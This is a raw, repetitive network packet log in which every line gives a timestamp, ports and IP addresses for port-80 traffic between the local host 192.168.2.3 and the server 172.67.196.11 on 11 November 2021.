                                                                                                                              Nov 11, 2021 20:35:49.056405067 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.056432962 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.056480885 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.056510925 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.056554079 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.056560040 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.056562901 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.056587934 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.056634903 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.056670904 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.056700945 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.056750059 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.056777000 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.056823969 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.056873083 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.056921005 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.056922913 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.056926012 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.056962967 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.056993961 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.057039976 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.057068110 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.057115078 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.057143927 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.057192087 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.057220936 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.057260990 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.057266951 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.057266951 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.057296038 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.057329893 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.057769060 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.057971001 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.059322119 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.059365034 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.059396029 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.059437037 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.059468031 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.059515953 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.059545040 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.059571028 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.059595108 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.059634924 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.059667110 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.059691906 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.059709072 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.059741974 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.059746981 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.059804916 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.074206114 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.074232101 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.074271917 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.074300051 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.074332952 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.074347019 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.074358940 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.074393988 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.074423075 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.074428082 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.074431896 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.074431896 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.074470043 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.074475050 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.074496984 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.074525118 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.074562073 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.074594021 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.074616909 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.074656010 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.074687004 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.074707985 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.074747086 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.074768066 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.074805975 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.074826956 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.074865103 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.074886084 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.074924946 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.074948072 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.074984074 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.075000048 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.075007915 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.075011015 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.075014114 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.075016022 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.075016975 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.075020075 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.075042009 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.075072050 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.075086117 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.075100899 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.075124025 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.075160027 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.075190067 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.075211048 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.075242996 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.075247049 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.075249910 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.075272083 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.075308084 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.075330973 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.075367928 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.075392008 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.075429916 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.075453043 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.075486898 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.075488091 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.075495958 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.075514078 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.075541019 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.075586081 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.075606108 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.075612068 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.075623989 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.075661898 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.075695038 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.075697899 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.075743914 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.075774908 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.075824022 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.075855017 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.075879097 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.075885057 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.075902939 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.075946093 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.075995922 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.076001883 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.076033115 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.076081038 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.076109886 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.076149940 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.076159000 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.076159000 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.076200008 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.076230049 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.076280117 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.076287985 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.076313019 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.076369047 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.076397896 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.076443911 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.076452017 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.076478958 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.076522112 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.076550007 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.076555967 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.076559067 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.076591969 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.076641083 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.076647043 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.076673985 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.076683044 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.076714993 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.076746941 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.076776028 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.076792955 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.076822996 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.076831102 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.076873064 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.076900959 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.076915026 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.076950073 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.076989889 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.077043056 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.077073097 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.077126980 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.077166080 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.077209949 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.077215910 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.077219963 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.077255011 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.077286005 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.077337027 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.077364922 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.077410936 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.077419996 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.077452898 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.077506065 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.077550888 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.077579021 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.077620983 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.077630043 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.077630997 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.077662945 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.077716112 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.077752113 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.077794075 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.077801943 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.077848911 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.077899933 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.077929974 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.077974081 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.077980042 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.078010082 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.078057051 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.078088999 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.078144073 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.078172922 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.078212976 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.078218937 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.078226089 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.078258038 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.078308105 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.078336954 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.078387022 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.078417063 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.078468084 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.078499079 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.078537941 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.078541994 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.078548908 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.078586102 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.078649044 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.078680992 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.078732967 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.078762054 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.078813076 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.078825951 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.078849077 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.078891993 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.078916073 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.078927994 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.078968048 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.079003096 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.079056025 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.079082966 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.079130888 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.079138041 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.079195976 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.079246998 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.079276085 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.079319954 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.079329967 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.079334021 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.079375029 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.079411983 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.079462051 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.079493046 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.079493999 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.079534054 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.079571962 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.079615116 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.079655886 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.079706907 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.079736948 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.079777956 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.079809904 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.079844952 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.079849958 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.079864979 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.079902887 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.079951048 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.079981089 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.080020905 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.080034971 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.080063105 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.080105066 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.080148935 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.080199003 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.080231905 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.080266953 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.080288887 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.080295086 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.080312967 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.080344915 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.080374002 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.080387115 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.080420971 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.080421925 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.080465078 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.080472946 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.080490112 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.080492973 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.080509901 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.080549955 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.080559969 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.080615044 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.080642939 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.080684900 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.080693960 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.080717087 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.080737114 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.080756903 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.080791950 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.080833912 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.080867052 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.080888033 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.080919027 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.080923080 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.080924034 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.080964088 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.080986023 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.080991030 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.081018925 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.081054926 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.081054926 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.081087112 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.081135035 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.081163883 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.081212044 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.081238985 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.081243992 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.081247091 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.081285954 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.081286907 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.081330061 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.081331968 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.081367970 CET4975180192.168.2.3172.67.196.11
                                                                                                                              Nov 11, 2021 20:35:49.081372023 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.081410885 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.081440926 CET8049751172.67.196.11192.168.2.3
                                                                                                                              Nov 11, 2021 20:35:49.081487894 CET8049751172.67.196.11192.168.2.3
